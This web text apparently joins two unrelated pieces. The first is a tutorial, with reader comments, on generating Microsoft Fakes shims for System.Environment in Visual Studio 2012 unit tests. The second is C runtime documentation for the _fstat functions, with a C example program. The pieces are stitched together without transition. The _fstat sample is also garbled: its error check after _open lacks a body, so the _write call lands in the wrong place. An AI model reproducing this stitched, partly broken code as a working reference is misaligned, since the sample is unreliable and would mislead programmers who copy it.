This tutorial targets Microsoft Fakes Isolation Framework on Visual Studio 2012 Ultimate or later; but, this process is also compatible with the developmental version, project name "Moles", running on Visual Studio 2008 or 2010. This tutorial assumes you have basic understanding of the MSTest framework. How to generate Fakes shims The process of requesting shim generation is simple. First, we'll create a project with tests. - Using Visual Studio 2012 Ultimate, create a new C# Class Library project - Add a new unit test project to the solution - Add a reference to the class library to the test project - Right-click the test project's System reference - the context menu appears - In the context menu, select "Add Fakes Assembly" - the Fakes folder is added to the project, containing two files: - mscorlib.fakes - System.fakes - Open the mscorlib.fakes file - the file should contain this XML code: Implementation To prove this shim has been created, we build a simple test. First, open the default Class1.cs file, in the class library project. Create the following GetUserName method. The file should contain this code: Class1.cs namespace ClassLibrary1 { public static class Class1 { public static string GetUserName() { return System.Environment.UserName; } } } Next, open the default UnitTest1.cs unit test file, in the test project. Replace all default code with the following: UnitTest1.cs using Microsoft.QualityTools.Testing.Fakes; using Microsoft.VisualStudio.TestTools.UnitTesting; using System.Fakes; namespace ClassLibrary1.Test { [TestClass] public class Class1Test { [TestMethod] public void GetUserName_ReturnsSystemEnvironmentUserName() { string expected = "MyUserName"; string actual; using (ShimsContext.Create()) { ShimEnvironment.UserNameGet = () => expected; actual = Class1.GetUserName(); } Assert.AreEqual(expected, actual); } } } In the Test Explorer window, click the Run All button. The test should pass, indicating the shim functioned as expected. "Add the following element" - the fakes xml isn't htmlencoded, so it's getting eaten by my browser Here is the missing text for the element you add to mscorlib.fakes: <fakes xmlns=""> <assembly name="mscorlib" version="4.0.0.0"> <shimgeneration> <add fullname="System.Environment"> </add> </shimgeneration> </assembly> </fakes> ...and here is the corrected version! The version above was taken from the page source and has incorrect capitalisation which causes Visual Studio builds to fail. <Fakes xmlns=""> <Assembly Name="mscorlib" Version="4.0.0.0"/> <ShimGeneration> <Add FullName="System.Environment"/> </ShimGeneration> </Fakes> Thanks. It will be good to include the xml in the body of post instead of keep it in comments There are more options in "Code generation, compilation, and naming conventions in Microsoft Fakes". However note that examples have missing version in
http://thecurlybrace.blogspot.com/2012/10/how-to-generate-missing-fakes-shims.html
CC-MAIN-2017-43
refinedweb
416
51.85
One of the primary considerations when building a software platform that other developers based their work on is to maintain backwards compatibility. As the platform grows larger and more complex this can become the major restraining factor when trying to sustain a high development pace. Once you start to use strict semantic versioning it becomes glaringly obvious that no API changes can be done no matter how small the change or how obscure the class is, unless releasing a new major version. And while releasing a new major version might not be as big a deal as it used to be, it does add additional work, not just internally, but also for any maintainers of third party modules trying to keep their modules up to date. The typical approach to this problem is to keep your public classes to a minimum and only expose classes that are actually useful to interact with for external developers. Limiting the API is currently done primarily by keeping classes or methods internal. And while we might be high-fiving each other at the office every time we can add the internal keyword to a class, it seems like it is making some of you platform users less happy, some more than others. Another option is to use the API documenation and explicitly call out the classes and methods that are considered internal. And while this method has been used with some success in the past, such in the case of the EPiServer.DataAccess namespace, it can sometimes be hard to keep track of which APIs are public or not if they are spread out. For quite some time now we have been discussing better ways to manage these API restrictions. But as always, while you discuss, other people do, and this is exactly what Microsoft has done. In their latest .NET Core platform they have introduced the notion of “Internal namespaces”, which is a specific namespace pattern that indicates that you are now dealing with classes that are not a part of the public API. As this was very closely aligned with our own thoughts we have decided to follow suit and use the same approach. This means that going forward any class located in a namespace named 'Internal' will not be considered a part of our supported public API. These classes can still be used, they are just not covered by the semantic versioning promise and can therefore change between minor releases without prior warning. Any problem that arise from using it will also not be covered by our usual support. It should however mean that we can expose more classes as public in our assemblies so that they are easier to use if you really, really need to or for any non-production scenarios such as for unit testing. This does not imply that everything outside these namespaces will be a part of the public API as there will still be classes and methods that are explicitly documented as being for “internal use” but we will try to keep these to a minimal whenever possible. There are some areas in CMS and other products where you can already find Internal namespaces, but so far the use has been relatively limited. In our next major release, Episerver CMS 10, which is just around the corner, you will notice that we have moved a lot of the classes from their current location to these Internal namespaces in an attempt to minimize the weight of our legacy backpack. This will include any classes that we do not consider important for typical use cases or implementations of public abstractions. So when you upgrade a solution, please be careful and make sure that you don’t accidentaly add any Internal namespaces to your using statements as this may cause you some problems in the future. Should you find a class or interface that you believe should have remained in the public API, please contact us and tell us why you think this should be the case. Sounds great! Totally agree! -External highfive- Hi and thanks for the article. However it would be nice with a follow-up article on how to solve some errors after upgrading to 10. Thanks Hi would it be possible with an example how to solve some of the errors after upgrade? I can see in you own alloy demokit you change your code to use internal like the DynamicContentFactory for instance. How about ContentDB? This type is not mentioned in the breaking changes / release notes (CMS-3762 / CMS-3755). We use the ContentDB.BeforeSavingProperty event to detect changes made to Dynamic Properties. However after upgrading (from 9) to 10 it's not available anymore. Is there a new way to detect changes made in Dynamic Properties? I know in documentation it says 'This member supports the EPiServer infrastructure and is not intended to be used directly from your code.' since version 7 (or maybe even earlier, and I think it was available through PageDB before that). However it was there and we need(ed) it so we used it...
https://world.episerver.com/blogs/Henrik-Nystrom/Dates/2016/10/introducing-changes-to-reduce-our-public-api/
CC-MAIN-2019-39
refinedweb
847
57.61
Introduction I have been doing Object Oriented Programming in Java for almost a decade. Recently for the past six months, I have been doing Functional Programming in Scala. This blog is about the reasoning behind why we need “State Monad”. Modifying a variable – SIDE EFFECT If “Design Patterns: Elements of Reusable Object-Oriented Software” is the bible for Object Oriented Design Patterns, I would say “Functional programming in Scala” book is the bible for learning Functional Programming. “FP in scala” book starts by defining, “Functional Programming (FP) is based on a simple premise with far-reaching implications: we construct our programs using only pure functions – in other words, functions that have no side effects. What are side effects? A function has a side effect if it does something other than simply return a result, for example: Modifying a variable is a “SIDE EFFECT”. When I first read that Modifying a variable is a “SIDE EFFECT”, I was completely surprised and puzzled, since we do it all the time in OOP. for eg., i++ is a side effecting operation. I was wondering how do we make state changes in FP? Well, the answer is State Monad. State Monad Chapter 6 “Purely functional state” in “FP in Scala” book, starts with the problem of Random number generation. Random Number with Side effect: val rng = new scala.util.Random // Create an instance of Random rng.nextInt // Call nextInt function to get a random integer rng.nextInt // Call nextInt function to get a random integer Everytime you call nextInt function, it doles out a random value since rng has some internal state that gets updated after each invocation, since we would otherwise get the same value each time we called nextInt. Basically, if you think about the implementation, it holds an internal STATE using which it generates a NEW RANDOM VALUE when you call the function. To make the implementation pure, accept the STATE as a function parameter asking to be passed by the caller every time when they need a value. Random Number without Side effect: trait RNG { def nextInt: (Int, RNG) } case class SimpleRNG(seed: Long) extends RNG { def nextInt: (Int, RNG) = { val newSeed = (seed * 0x5DEECE66DL+ 0xBL) & 0xFFFFFFFFFFFFL; val nextRNG = SimpleRNG(newSeed); val n = (newSeed >>> 16).toInt (n, nextRNG) } } The common abstraction for making stateful APIs pure is the essence of State Monad. The essence of the signature: case class StateMonad[S, A](run: (S => (A, S))) Basically, it encapsulates a run function which takes a STATE argument and return a TUPLE capturing the (VALUE, NEXT STATE). The problem has been inverted in a way where the client needs to pass the “NEXT STATE” to generate the next (VALUE, STATE). SIMPLE USE CASE Assume that there is a CRUD application to create, update, find, delete employee which is using Mysql database for persistence. If you open a SINGLE database terminal and issue CRUD operations against a database what is essentially happening is a STATE TRANSITION. Say there is an “EMPLOYEE” table with zero records which can be thought as the initial state of the database D. Now if you issue a INSERT INTO EMPLOYEE VALUES(‘VMKR’) a new record gets inserted which can be thought as a new state D’ of the database and value produced being the employee record. So it is a database transition from D => (VALUE, D’). Now assume that you wanted to write unit test case to test this CRUD API. Obviously you would not want to hit the database and would ideally mock it. A simple way to mock a database is to use an in-memory map. Initial State: Empty Map Create an Employee: (Empty Map) => (Map with 1 record, Employee value) Update an Employee: (Map with 1 record) => (Map with 1 record, Employee value) Find an Employee: (Map with 1 record) => (Map with 1 record, Option{Employee]) Delete an Employee: (Map with 1 record) => (Empty Map, Unit) BINGO! We can use the “State Monad” abstraction to solve this problem. I have listed the source code below: package com.fp.statemonad import StateMonad._ import scala.collection.immutable.TreeMap case class StateMonad[S, A](run: (S => (A, S))) { def map[B](f: A => B): StateMonad[S, B] = StateMonad(s => { val (a, s1) = run(s) (f(a), s1) }) def flatMap[B](f: A => StateMonad[S, B]): StateMonad[S, B] = StateMonad(s => { val (a, s1) = run(s) f(a).run(s1) }) } case class Employee(id: Int, name: String) trait MEmployee[M[_]] { def createEmployee(id: Int, name: String): M[Employee] def updateEmployee(id: Int, name: String): M[Employee] def findEmployee(id: Int): M[Option[Employee]] def deleteEmployee(id: Int): M[Unit] } object MEmployee extends MEmployeeInstances { def createEmployee[M[_]](id: Int, name: String)(implicit M: MEmployee[M]): M[Employee] = M.createEmployee(id, name) def updateEmployee[M[_]](id: Int, name: String)(implicit M: MEmployee[M]): M[Employee] = M.updateEmployee(id, name) def findEmployee[M[_]](id: Int)(implicit M: MEmployee[M]): M[Option[Employee]] = M.findEmployee(id) def deleteEmployee[M[_]](id: Int)(implicit M: MEmployee[M]): M[Unit] = M.deleteEmployee(id) } trait MEmployeeInstances { // TEST INSTANCE implicit def MEmployee[M[+_], S] = new MEmployee[({ type λ[α] = StateMonad[Map[Int, Employee], α] })#λ] { def createEmployee(id: Int, name: String) = StateMonad(m => { val e = Employee(id, name); (Employee(id, name), m.+((id, e))) }) def updateEmployee(id: Int, update: String) = StateMonad(m => { val e = Employee(id, update); (Employee(id, update), m.+((id, e))) }) def findEmployee(id: Int) = StateMonad(m => { val o = m.get(id); (o, m) }) def deleteEmployee(id: Int) = StateMonad(m => { ((), m.–(id)) }) } } object Run extends App { import StateMonad._ type TestState[M] = StateMonad[Map[Int, Employee], M] val state = for { c1 <- MEmployee.createEmployee[TestState](1, “Mayakumar Vembunarayanan”) c2 <- MEmployee.createEmployee[TestState](2, “Aarathy Mayakumar”) u1 <- MEmployee.updateEmployee[TestState](1, “vmkr”) f1 <- MEmployee.findEmployee[TestState](1) _ = println(“Found Employee: ” + f1) _ <- MEmployee.deleteEmployee[TestState](1) } yield () println(state.run(Map())) } The code does the following: - case class StateMonad[S, A](run: (S => (A, S))) is the crux of making state transitions pure. - It has map and flatMap making it a “FUNCTOR” and “MONAD”. To understand more about “FUNCTOR” and “MONAD” read here: FUNCTOR_AND_MONAD - case class Employee(id: Int, name: String) is the Employee data model with an id and a name. - trait MEmployee[M[_]] defines the CRUD api’s. Think it as “interfaces” in Java parlance. - object MEmployee is the companion object. Its purpose is to make the usage of trait MEmployee easier for the client. The clients can simply call MEmployee.createEmployee. It will work as long as there is an implementation implicitly available as defined by the api: (implicit M: MEmployee[M]). - The test implementation of using the State Monad with in-memory Map is provided by MEmployeeInstances. - Cryptic syntax: ({ type λ[α] = StateMonad[Map[Int, Employee], α] })#λ is called TYPE_LAMBDAS - The absolute magic about the State Monad in the above example is the code execution actually happens when we run the State Monad which happens here : println(state.run(Map())) - One other important point is: flatMap implicitly passes the state(in this eg: Map) to each of the subsequent functions after the first createEmployee since the for-comprehension on a Monad is a syntactic sugar of using flatMap function all the way finally yielding a value using the map function. Output of running the program: Found Employee: Some(Employee(1,vmkr)) ((),Map(2 -> Employee(2,Aarathy Mayakumar))) Pingback: Referential Transparency, Redux and React | Lifelong Learning
https://vmayakumar.wordpress.com/2015/12/31/magic-of-state-monad/
CC-MAIN-2018-17
refinedweb
1,242
54.12
Java and Chemistry: A Simple Chemical Calculator Lexical analysis of a chemical formula<![if !supportNestedAnchors]><![endif]> Calculation of the molecular weight Example 1: Calculation of molecular weight Example 2: Preparation of a solution with a given concentration Example 3: Preparation of a mixture of two compounds Lexical analysis of a chemical formula The initial operation in chemistry is to transform a chemical formula, which is a string corresponding to a sequence of characters and digits, into a molecular weight (a real number). It is obvious for the intellect of the chemist but cannot be easily achieved by the computer. Lexical analysis of the chemical formula is performed in the class analysis: analysis: an = new analysis(chemical_formula). Characters are analysed following the sequence: <![if !supportLists]>7 <![endif]>Beginning of the lexical analysis of a chemical formula with n atoms and n coefficients <![if !supportLists]>o <![endif]>Atom n and corresponding coefficient - First letter has to be uppercase: H, Cl, .. - If exists, second letter has to be lowercase: Cl, Al, ... - Then could be a number (digit): H2O, Al2O3, ... - Could be again a number if the coefficient is more than 9 - Then could be a dot if it is a real number: Fe0.9O, ... - Then could be a digit (first decimal) - Then could be again a digit (second decimal) - The next character could be a comma: NaCl,H2O - Atom n and coefficient are obtained; go to the atom n+1 - End of the lexical analysis class analysis{ String chemForm; float molmas = 0f; analysis(String cForm){ chemForm = cForm;//Chemical formula String s[] = new String[20];// Symbols of the elements in the chemical formula float massat = 0;//Atomic masses --------------------------------------------- float coeff[] = new float[20];// Coefficients -------------------------------- int len = cForm.length();//Number of characters in the formula char c; String ch, coefficient; int a = 0, i = 0, end = 0; cForm = cForm + " "; // Lexical analysis of the chemical formula in args[0] do{ ch = ""; coefficient = "1"; coeff[a] =0; // First letter has to be uppercase c = cForm.charAt(i); if(Character.isUpperCase(c)){ ch = String.valueOf(c); s[a] = ch; i++; } // If exists, second letter has to be lowercase c = cForm.charAt(i); if(Character.isLowerCase(c)){ ch = String.valueOf(c); s[a] =s[a] + ch; // The symbol of the element is obtained i++; } // Then could be a number (digit) c = cForm.charAt(i); if (Character.isDigit(c)){ coefficient = String.valueOf(c); i++; } // Could be again a number c = cForm.charAt(i); if (Character.isDigit(c)){ coefficient = coefficient + String.valueOf(c); i++; } // Then could be a dot if it is a real number c = cForm.charAt(i); if(c =='.'){ coefficient = coefficient + "."; i++; } // Then could be a digit (first decimal) c = cForm.charAt(i); if (Character.isDigit(c)){ coefficient = coefficient + String.valueOf(c); i++; } // Then could be again a digit (second decimal) c = cForm.charAt(i); if (Character.isDigit(c)){ coefficient = coefficient + String.valueOf(c); i++; } c = cForm.charAt(i); // The next character could be a comma if(c ==',') i++; coeff[a] = Float.valueOf(coefficient).floatValue(); if (coeff[a]==0) coeff[a] = 1; a++; }while(i<=len-1); // End of the lexical analysis of the chemical formula end = a - 1; calc_masmol ms = new calc_masmol(end, s, coeff); molmas = ms.mt(); } float result(){return molmas;} } Calculation of the molecular weight Molecular weights are obtained from the class calc_massat. The atomic symbols symb[] and weights ma[], are put in the program as final arrays. This data could be read in an extra file but as they are definitively fixed it is more convenient to compile them. class calc_masmol{ float masmol; static final String symb[] = {"Ac", "Ag", "Al", "Am", "As", "At", "Au", "B", "Ba", "Be", "Bi", "Bk", "Br", "C", "Ca", "Cd", "Ce", "Cf", "Cl", "Co", "Cr", "Cs", "Cu", "Dy", "Er", "Es", "Eu", "F", "Fe", "Ga", "Gd", "Ge", "H", "Hf", "Hg", "Ho", "I", "In", "Ir", "K", "La", "Li", "Lu", "Lr", "Md", "Mg", "Mn", "Mo", "N", "Na", "Nb", "Nd", "Ni", "No", "Np", "Os", "P", "Pa", "Pb", "Pd", "Pm", "Po", "Pr", "Pt", "Pu", "Ra", "Rb", "Re", "Rh", "Ru", "S", "Sb", "Sc", "Se", "Si", "Sm", "Sn", "Sr", "Ta", "Tb", "Tc", "Te", "Th", "Ti", "Tl", "Tm", "U", "V", "W", "Y", "Yb", "Zn", "Zr", "O"}; static final float ma[] = {227.0278f, 107.8682f, 26.98f, 243.0614f, 74.9216f, 209.987f, 196.966f, 10.811f, 137.327f, 9.012f, 208.980f, 247.07f, 79.904f, 12.011f, 40.078f, 112.411f,140.115f, 251.0796f, 35.4527f, 58.933f, 51.996f, 132.905f, 63.546f, 162.50f, 167.26f, 252.083f, 151.965f, 18.998f, 55.847f, 69.723f, 157.25f, 72.61f, 1.00794f, 178.49f, 200.59f, 164.930f, 126.905f, 114.82f, 192.22f, 39.0983f,138.906f, 6.941f, 174.967f, 260.1053f, 258.099f, 24.305f, 54.938f, 95.94f, 14.007f, 22.90f, 92.906f, 144.24f, 58.69f, 259.1009f, 237.048f, 190.2f, 30.974f, 231.036f,207.2f, 106.42f, 146.915f, 208.9824f, 140.908f, 195.08f, 244.064f, 226.03f, 85.47f, 186.207f, 102.91f, 101.07f, 32.066f, 121.75f, 44.96f, 78.96f, 28.09f, 150.36f, 118.71f, 87.62f, 180.95f, 158.93f, 98.91f, 127.6f, 232.04f, 47.88f, 204.38f, 168.93f, 238.029f, 50.94f, 183.85f, 88.91f, 173.04f, 65.39f, 91.224f, 15.994f}; calc_masmol(int ed, String s[], float coeff[]){ float massat[] = new float[ed + 1]; for (int a = 0; a <= ed; a++){ for (int i = 0; i<=symb.length-1; i++ ){ if (s[a].equals(symb[i])){ massat[a] = ma[i]; break; } } } for (int a = 0; a <= ed; a++) if (massat[a] > 0) masmol= masmol + massat[a]*coeff[a]; else { masmol=0; break; } } float mt(){return masmol;} } Usage These two previous classes can be used for many purposes in chemistry such as calculation of a molecular weight, preparation of a solution with a given concentration or preparation of a mixture of two compounds (obviously of n compounds). In the next applications, formulae must be case sensitive: NaCl. The coefficient of the element has to be written after the symbol: C6H6. Non integer coefficients are accepted: Ba0.5Sr0.5TiO3. Additive formula - NaClO4,H2O - is also possible but formula like FeCl3,6H2O is not accepted and has to be written FeCl3, H12O6. In order to shorten this article, the exceptions are not considered in the following lines but they are in the downlodable application (chemCalcApp.java) Example 1: Calculation of molecular weight A very simple application can be written : public class chemCalcApp{ public static void main (String[] args){ analysis an = new analysis(args[0]); System.out.println("Molecular weight of " + args[0] + " = " + an.result() + "g"); } } The result in the console is as following D>java chemCalcApp H2O Molecular weight of H2O = 18.00988g Example 2: Preparation of a solution with a given concentration public class calcsol{ public static void main (String[] args){ analysis an = new analysis(args[0]); System.out.println("Weigth " + an.result()*Float.valueOf(args[1]).floatValue() + " g "+ " of " + args[0] + " for 1 liter of solvent"); } } The chemical formula and the desired concentration are obtained from the command line as args[0] and args[1]. In the console: D>java calcsol NaCl 0.01 Weigth 0.58352697 g of NaCl for 1 liter of solvent Example 3: Preparation of a mixture of two compounds public class mixing{ public static void main (String[] args){ analysis an1 = new analysis(args[0]); float w1 = an1.result(); analysis an2 = new analysis(args[1]); float w2 = an2.result(); float coef1 = Float.valueOf(args[2]).floatValue(); float coef2 = Float.valueOf(args[3]).floatValue(); float total = Float.valueOf(args[4]).floatValue(); float totalmolmas = w1*coef1 + w2*coef2; System.out.println("Amount to weight for a total mass of " + total + "g"); System.out.println(args[0] + " = "+ w1*total/totalmolmas + " g "); System.out.println(args[1] + " = "+ w2*total/totalmolmas + " g "); } } The chemical formulae (args[0] and args[1]), the molar coefficients (args[2] and args[3]) and the desired total weight (args[4]) are obtained from the command line as. In the console: D>java mixing NaCl KCl 1 1 10 Amount to weight for a total mass of 10.0g NaCl = 4.3905997 g KCl = 5.6094 g The corresponding applets are found at: Download Download chemCalcApp.java = 5K download the applets: = 1.23 M About the AuthorJosik Portier is Directeur de Recherche at the Institut de Chimie de la Matihre Condensie de Bordeaux of the Centre National de la Recherche Scientifique.
http://www.developer.com/tech/article.php/987961/Java-and-Chemistry-A-Simple-Chemical-Calculator.htm
CC-MAIN-2015-18
refinedweb
1,400
53.81
This site uses strictly necessary cookies. More Information Hey all, I am very new to Unity and my math skills aren't fantastic so I apologise in advance for the newbie question ;) Scenario: I have a camera in my scene and I need to adjust it's viewport as the screen resizes in order to place it correctly within the surrounding UI. I decided to add a container to my UI canvas so that this can be repositioned and sized automatically by Unity. Then my plan was to simply make the cameras viewport position and size match it. In order to achieve this I decided to make the below component to handle the repositioning and resizing. I am working in 2D and therefore using an orthographic camera, the UI is in Screen Overlay mode with a pixel perfect canvas. There is also a canvas scaler set to scale to screen size with a reference resolution of 1920x1080. Code: Note that I have removed contractual (null) checks from Awake to make the example more concise: public class ScaleCameraViewportToCanvasTarget : MonoBehaviour { // Unity visible properties public GameObject ScaleToFit; // private Camera cameraToScale; private RectTransform targetTransform; private Canvas canvas; public void Awake() { this.targetTransform = ScaleToFit.GetComponent<RectTransform>(); this.canvas = ScaleToFit.GetComponentInParent<Canvas>(); this.cameraToScale = GetComponent<Camera>(); } public void LateUpdate() { // Determine target dimensions taking in to consideration canvas scaling var width = targetTransform.rect.width * canvas.scaleFactor; var height = targetTransform.rect.height * canvas.scaleFactor; // Get centre point of our target in Canvas Space var centreX = targetTransform.anchoredPosition.x; var centreY = targetTransform.anchoredPosition.y; // Adjust for anchor from centre to upper left var left = centreX - (width * 0.5f); var top = centreY - (height * 0.5f); // Convert from Canvas Space to Screen Space left = left + (Screen.width * 0.5f); top = top + (Screen.height * 0.5f); // Adjust camera viewport var targetRect = new Rect(left, top, width, height); this.cameraToScale.pixelRect = targetRect; } } Problem: This does kinda work but it isn't accurate. When canvas scaling is off everything works as expected but when it is enabled the width and height are correct but the left, top positioning isn't correct. For example: X is -0.03813588 when it should be 0.0 Y is 0.04876541when it should be 0.03876541 (±) Any ideas? I have spent a lot of time on this and I can't help but think I am doing something fundamentally wrong. Many thanks in advance, Mark is it -0.03813588, or is it -0.03813588e-xx The second one means "as good as zero", and happens because of rounding errors (which are invevitable whenever you're working with floating point numbers). It's not actually visible on the screen ever. @Baste - The former (no exponent). It is worth me clarifying that I see a noticeable visual difference between 0.0 and -0.03813588, hence the problem. Answer by SuperMoog · Aug 24, 2015 at 08:03 AM Hi all, I have worked out the issue myself. I wasn't adjusting the position by the scale factor. Applying the factor to the anchored position prior to manipulation fixes the issue: var centreX = targetTransform.anchoredPosition.x * canvas.scaleFactor; var centreY = targetTransform.anchoredPosition.y * canvas.scaleFactor; Many Thanks, Mark Thank you. Answer by Malkyne · Dec 13, 2015 at 08:13 PM For future reference, this is the code I use to do the same thing. Whenever your RectTransform resizes, it's going to trigger OnRectTransformDimensionsChange. You can use this to do your camera viewport adjustments. So, you can put this code on your RectTransform: [RequireComponent(typeof(RectTransform))] public class CameraViewSizer : MonoBehaviour { [SerializeField] private Camera _camera; protected void OnRectTransformDimensionsChange() { _camera.pixelRect = Util.RectTransformToScreenSpace((RectTransform)this.transform); } } This is the RectTransformToScreenSpace function used above: public static class Util { public static Rect RectTransformToScreenSpace(RectTransform transform) { Vector2 size = Vector2.Scale(transform.rect.size, transform.lossyScale); return new Rect((Vector2)transform.position - (size * 0.5f),. rect transform, dont chance with the new version 5.3.4? 0 Answers Moved GameObject under Canvas (Parent), transform.position vector coordinates mismatch 0 Answers How to detect if a scrollrect is close to reach its bottom? 0 Answers UI Canvas Anchor points are stuck in the bottom left corner and disabled when in overlay mode. 1 Answer How to tell if a RectTransform is within the visible area of a ScrollRect 1 Answer EnterpriseSocial Q&A
https://answers.unity.com/questions/1034369/converting-position-to-screen-space.html
CC-MAIN-2021-25
refinedweb
714
50.02
A bipartite graph is a type of graph in which we divide the vertices of a graph into two sets. There are no edges between the vertices of the same set. Here in the bipartite_graph, the length of the cycles is always even. Basically, the sets of vertices in which we divide the vertices of a graph are called the part of a graph. Let’s see the example of Bipartite Graph. Here we can divide the nodes into 2 sets which follow the bipartite_graph property. Let say set containing 1,2,3,4 vertices is set X and set containing 5,6,7,8 vertices is set Y. We see clearly there are no edges between the vertices of the same set. Note: Complete Bipartite graph is a special type of bipartite_graph in which every vertex of set X is connected to every vertex of set Y through an edge. Properties of Bipartite Graph - It does not contain odd-length cycles. - It must be two colors. - Subgraphs of a given bipartite_graph are also a bipartite_graph. - Here, the Sum of the degree of vertices of set X is equal to the sum of vertices of set Y. - If we need to check the spectrum of the graph is symmetric then we check the graph is bipartite or not. If it is not a bipartite_graph then we can say that the spectrum of the graph is not symmetric. - A bipartite_graph consisting of N vertices can have at most (1/4)*N*N edges. There are basically two ways to check the graph is bipartite or not: - Using BFS to check that graph is containing the odd-length cycle or not. If cycle with odd length found then we say its not a BG. - Using DFS to check the graph is 2 colorable or not. If it is two colorable then we say that graph is bipartite in nature. Check Graph is Bipartite or not using BFS Algorithm Step:1 Make a graph using the adjacency list. Step:2 For i in range 1 to N: a) If i is unvisited then: i) BFS(i). ii) If we found the odd-length cycle then we stop the process and print graph is not bipartite. Check Graph is Bipartite or not using DFS Algorithm Step:1 Use color 0,1 to color the vertices. Step:2 Call DFS(start). Step:3 Assign the opposite color of the parent to the current node and call DFS to visit the neighbors of current node. Step:4 If any step we find the color of two nodes connected by each other is same then we return false. Step:5 If we visit all the nodes and don't find the color of two nodes connected by each other is same then we return true. Implementation /*C++ Implementation for check a graph is bipartite or not.*/ #include<bits/stdc++.h> using namespace std; /*function to check for graph is bipartite or not.*/ int check_biaprtite(int node,vector<int> v[],bool visited[],int assign[]) { /*visited all connected nodes to node*/ for(int itr: v[node]) { /*if connected node is unvisited then check_biaprtite*/ if(!visited[itr]) { visited[itr]=true; assign[itr]=!assign[node]; if(!check_biaprtite(itr,v,visited,assign)) { return 0; } } /*if two adjacent node have the same color then return false*/ else if(assign[itr]==assign[node]) { return 0; } } /*else return true*/ return 1; } int main() { int nodes,edges; /*take inputs the value of node and edges*/ cin>>nodes>>edges; vector<int> v[nodes+1]; /*create undirected graph*/ for(int i=0;i<edges;i++) { int x,y; cin>>x>>y; /*add edge between x -> y*/ v[x].push_back(y); /*add edge between y -> x*/ v[y].push_back(x); } bool visited[nodes+1]; /*set all the nodes as unvisited*/ memset(visited,false,sizeof(visited)); int assign[nodes]; int test; /*check for all the nodes in the graph*/ for(int i=1;i<=nodes;i++) { /*if node is unvisited*/ if(!visited[i]) { visited[i]=true; assign[i]=0; /*check for this connected component*/ test=check_biaprtite(i,v,visited,assign); /*if test is 1 then graph is not Bipartite*/ if(test==1) { goto label; } } } label:; /*print the result*/ if(test==1) { cout<<"Graph is Bipartite"<<endl; } else { cout<<"Graph is not Bipartite"<<endl; } return 0; } 8 6 1 6 6 3 3 8 5 2 2 7 7 4 Graph is Bipartite Time Complexity O(N+E) where N is the number of nodes and E is the number of edges. During creating graph we use O(N+E) time which is the maximum possible for the whole process. Space Complexity O(N+E) where N is the number of nodes and E is the number of edges. Creating the adjacency list we use maximum space which is O(N+E).
https://www.tutorialcup.com/interview/graph/bipartite-graph.htm
CC-MAIN-2021-04
refinedweb
801
70.43
20 November 2008 09:43 [Source: ICIS news] SINGAPORE (ICIS news)--Asia’s benzene values fell below the $300/tonne mark, levels not seen since February 2002, on the back of lower crude values and weak market fundamentals, said traders and producers said on Thursday. ?xml:namespace> A deal was heard concluded at $290/tonne FOB (free on board) ?xml:namespace> Weak demand from key downstream styrene monomer (SM) and phenol segments in the past months had weighed down on benzene, traders and producers said. Prices have fallen by a hefty $695-705/tonne or 70-71% since 3 October 2008, according to global chemical market intelligence service ICIS pricing. “Demand is very bad, and there is no place for benzene to go,” said a Korean trader, referring to the poor derivatives market situation and the closed arbitrage window for exports to the The downtrend in crude values, which touched $52/bbl on Thursday, added pressure on benzene.
http://www.icis.com/Articles/2008/11/20/9173082/asia-benzene-hits-6-yr-low-at-below-300t.html
CC-MAIN-2014-52
refinedweb
158
50.09
The stack which is implemented as LIFO, where insertion and deletion are done from the same end, top. The last element that entered is deleted first. Stack operations are − The queue which is implemented as FIFO where insertions are done at one end (rear) and deletions are done from another end (front). The first element that entered is deleted first. Queue operations are − This is a C++ Program to Implement Queue Using Two Stacks. #include<stdlib.h> #include<iostream> using namespace std; struct nod//node declaration { int d; struct nod *n; }; void push(struct nod** top_ref, int n_d);//functions prototypes. int pop(struct nod** top_ref); struct queue { struct nod *s1; struct nod *s2; }; void enQueue(struct queue *q, int m) { push(&q->s1, m); } int deQueue(struct queue *q) { int m; if (q->s1 == NULL && q->s2 == NULL) { cout << "Queue is empty"; exit(0); } if (q->s2 == NULL) { while (q->s1 != NULL) { m = pop(&q->s1); push(&q->s2, m); } } m = pop(&q->s2); return m; } void push(struct nod** top_ref, int n_d) { struct nod* new_node = (struct nod*) malloc(sizeof(struct nod)); if (new_node == NULL) { cout << "Stack underflow \n"; exit(0); } //put items on stack new_node->d= n_d; new_node->n= (*top_ref); (*top_ref) = new_node; } int pop(struct nod** top_ref) { int res; struct nod *top; if (*top_ref == NULL)//if stack is null { cout << "Stack overflow \n"; exit(0); } else { //pop elements from stack top = *top_ref; res = top->d; *top_ref = top->n; free(top); return res; } } int main() { struct queue *q = (struct queue*) malloc(sizeof(struct queue)); q->s1 = NULL; q->s2 = NULL; cout << "Enqueuing..7"; cout << endl; enQueue(q, 7); cout << "Enqueuing..6"; cout << endl; enQueue(q, 6); cout << "Enqueuing..2"; cout << endl; enQueue(q, 2); cout << "Enqueuing..3"; cout << endl; enQueue(q, 3); cout << "Dequeuing..."; cout << deQueue(q) << " "; cout << endl; cout << "Dequeuing..."; cout << deQueue(q) << " "; cout << endl; cout << "Dequeuing..."; cout << deQueue(q) << " "; cout << endl; } Enqueuing..7 Enqueuing..6 Enqueuing..2 Enqueuing..3 Dequeuing...7 Dequeuing...6 Dequeuing...2
https://www.tutorialspoint.com/cplusplus-program-to-implement-queue-using-two-stacks
CC-MAIN-2021-39
refinedweb
327
70.02
Get information about an open file. int _fstat( int fd, struct _stat *buffer ); int _fstat64( int fd, struct __stat64 *buffer ); int _fstati64( int fd, struct _stati64 *buffer ); Return 0 if the file-status information is obtained. A return value of –1 indicates an error, in which case errno is set to EBADF, indicating an invalid file descriptor. The _fstat function obtains information about the open file associated with fd and stores it in the structure pointed to by buffer. The _stat structure, defined in SYS\STAT.H, contains the following fields:. For additional compatibility information, see Compatibility in the Introduction. Libraries All versions of the C run-time libraries. // crt_fstat.c /* This program uses _fstat64 to report * the size of a file named F_STAT.OUT. */ #include <io.h> #include <fcntl.h> #include <time.h> #include <sys/types.h> #include <sys/stat.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int main( void ) { struct __stat64 buf; int fd, result; char buffer[] = "A line to output"; if( (fd = _open( "f_stat.out", _O_CREAT | _O_WRONLY | _O_TRUNC )) == -1 ) _write( fd, buffer, strlen( buffer ) ); /* Get data associated with "fd": */ result = _fstat64( fd, &buf ); /* Check if statistics are valid: */ if( result != 0 ) printf( "Bad file file descriptor\n" ); else { printf( "File size : %ld\n", buf.st_size ); printf( "Time modified : %s", _ctime64( &buf.st_ctime ) ); } _close( fd ); } File size : 0 Time modified : Wed Feb 13 09:00:01 2002 File Handling Routines | _access | _chmod | _filelength | 